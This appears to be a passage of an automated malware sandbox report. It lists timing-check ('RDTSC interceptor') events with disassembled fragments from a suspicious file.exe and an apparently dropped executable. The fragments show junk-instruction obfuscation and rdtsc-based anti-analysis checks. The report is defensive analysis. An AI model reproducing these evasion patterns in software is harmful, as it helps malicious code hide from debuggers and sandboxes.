Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50807 second address: 4B5080D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5080D second address: 4B50849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b jmp 00007F8FA106A480h 0x00000010 shr ecx, 02h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8FA106A487h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50849 second address: 4B50871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5FCAh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rep movsd 0x0000000e rep movsd 0x00000010 rep movsd 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov ecx, edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8FA0CCCDE1h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50871 second address: 4B50892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 03h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50892 second address: 4B508A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA0CCCDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508A2 second address: 4B508CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rep movsb 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8FA106A485h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508CC second address: 4B508D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508D2 second address: 4B50988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000012 pushad 0x00000013 mov eax, 5D8B92ABh 0x00000018 pushfd 0x00000019 jmp 00007F8FA106A480h 0x0000001e sbb ax, 7838h 0x00000023 jmp 00007F8FA106A47Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, ebx 0x0000002c pushad 0x0000002d movzx ecx, di 0x00000030 mov bh, 0Ah 0x00000032 popad 0x00000033 mov ecx, dword ptr [ebp-10h] 0x00000036 jmp 00007F8FA106A488h 0x0000003b mov dword ptr fs:[00000000h], ecx 0x00000042 jmp 00007F8FA106A480h 0x00000047 pop ecx 0x00000048 pushad 0x00000049 mov dx, ax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushfd 0x0000004f jmp 00007F8FA106A488h 0x00000054 add ecx, 75127758h 0x0000005a jmp 00007F8FA106A47Bh 0x0000005f popfd 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50988 second address: 4B50996 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50996 second address: 4B5099C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5099C second address: 4B509E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FA0CCCDE5h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8FA0CCCDE9h 0x00000015 jmp 00007F8FA0CCCDDBh 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B509E1 second address: 4B504D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8FA106A488h 0x00000008 add ecx, 65AC9DA8h 0x0000000e jmp 00007F8FA106A47Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, 2EBA3C9Fh 0x0000001b popad 0x0000001c pop ebx 0x0000001d pushad 0x0000001e mov cx, 2097h 0x00000022 push ecx 0x00000023 mov dh, FAh 0x00000025 pop eax 0x00000026 popad 0x00000027 leave 0x00000028 pushad 0x00000029 jmp 00007F8FA106A481h 0x0000002e pushfd 0x0000002f jmp 00007F8FA106A480h 0x00000034 add ax, 3268h 0x00000039 jmp 00007F8FA106A47Bh 0x0000003e popfd 0x0000003f popad 0x00000040 retn 0008h 0x00000043 cmp dword ptr [ebp-2Ch], 10h 0x00000047 mov eax, dword ptr [ebp-40h] 0x0000004a jnc 00007F8FA106A475h 0x0000004c push eax 0x0000004d lea edx, dword ptr [ebp-00000590h] 0x00000053 push edx 0x00000054 call esi 0x00000056 push 00000008h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50BD0 second address: 4B50BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73A784 second address: 73A7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F8FA106A476h 0x0000000e jmp 00007F8FA106A47Ch 0x00000013 jmp 00007F8FA106A487h 0x00000018 jnc 00007F8FA106A476h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jc 00007F8FA106A476h 0x00000027 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 742F8F second address: 742F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 743249 second address: 743264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A487h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7433E4 second address: 7433E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7467CD second address: 7467D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7467D2 second address: 7467D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7467D8 second address: 7467DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7469B5 second address: 7469CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8FA0CCCDDCh 0x00000012 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7469CE second address: 7469D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7469D4 second address: 746A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 js 00007F8FA0CCCDDCh 0x0000000f and ecx, 0CA2B044h 0x00000015 push 00000003h 0x00000017 call 00007F8FA0CCCDDBh 0x0000001c add dword ptr [ebp+122D3068h], esi 0x00000022 pop edx 0x00000023 push 00000000h 0x00000025 sub dword ptr [ebp+122D333Bh], ecx 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F8FA0CCCDD8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 push 88D9F558h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746A35 second address: 746A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746A39 second address: 746A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746A3D second address: 746A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746A43 second address: 746A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 37260AA8h 0x00000010 mov dword ptr [ebp+122D26FAh], edx 0x00000016 lea ebx, dword ptr [ebp+1244B63Fh] 0x0000001c sbb edx, 42661709h 0x00000022 push eax 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 jo 00007F8FA0CCCDD6h 0x0000002c rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746A7E second address: 746A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746B2B second address: 746B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746B2F second address: 746B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746B4B second address: 746B7D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8FA0CCCDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 7487FDBDh 0x00000011 mov si, E78Fh 0x00000015 lea ebx, dword ptr [ebp+1244B64Ah] 0x0000001b mov edx, dword ptr [ebp+122D2E22h] 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8FA0CCCDDAh 0x0000002b rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 746B7D second address: 746B87 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 737289 second address: 73728D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73728D second address: 7372BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A486h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8FA106A47Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 765CF3 second address: 765D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE7h 0x00000007 je 00007F8FA0CCCDD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8FA0CCCDDAh 0x00000017 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 765FBC second address: 765FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A482h 0x00000009 js 00007F8FA106A47Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 765FE3 second address: 765FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 765FE9 second address: 765FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 ja 00007F8FA106A4ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F8FA106A476h 0x00000014 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7662CD second address: 7662D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 75D745 second address: 75D749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 75D749 second address: 75D760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDDh 0x00000007 jo 00007F8FA0CCCDD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 766FC0 second address: 766FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 766FC9 second address: 766FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8FA0CCCDD6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 767120 second address: 767127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 767282 second address: 76728C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FA0CCCDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73DB61 second address: 73DB74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73DB74 second address: 73DB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 76B8B1 second address: 76B8BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 76BD31 second address: 76BD37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 76AF39 second address: 76AF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 76AF53 second address: 76AF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA0CCCDE6h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73068C second address: 730692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 771932 second address: 77193C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 774740 second address: 774744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 774744 second address: 77476D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDDh 0x00000007 ja 00007F8FA0CCCDDCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F8FA0CCCDD6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77476D second address: 774771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 774771 second address: 77477D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F8FA0CCCDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77477D second address: 774798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A483h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 73231C second address: 732322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775297 second address: 7752A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775AAF second address: 775AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775AB3 second address: 775AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775AB9 second address: 775AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA0CCCDE9h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775AD6 second address: 775B0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F8FA106A478h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 sbb esi, 7454DE06h 0x00000029 push eax 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775B0E second address: 775B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 775CC3 second address: 775CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 776FA0 second address: 776FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 776FA5 second address: 776FAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 776FAC second address: 776FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007F8FA0CCCDDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 776FC5 second address: 776FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 776FC9 second address: 777005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor esi, dword ptr [ebp+122D3379h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F8FA0CCCDD8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 7795BC second address: 779608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 or di, 4A97h 0x0000000c push eax 0x0000000d movzx edi, di 0x00000010 pop esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F8FA106A478h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2CFAh] 0x00000033 xor esi, dword ptr [ebp+122D3088h] 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c jbe 00007F8FA106A484h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 779608 second address: 77960C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 779FA8 second address: 779FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8FA106A476h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77AA51 second address: 77AA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77AA55 second address: 77AA75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F8FA106A47Ch 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnp 00007F8FA106A476h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77EE5A second address: 77EE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77EE5E second address: 77EE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77FF1B second address: 77FF33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	RDTSC instruction interceptor: First address: 77FF33 second address: 77FF93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1245CB9Eh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F8FA106A478h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 pushad 0x00000031 mov ebx, dword ptr [ebp+1244C08Fh] 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c js 00007F8FA106A476h 0x00000042 jp 00007F8FA106A476h 0x00000048 popad 0x00000049 rdtsc
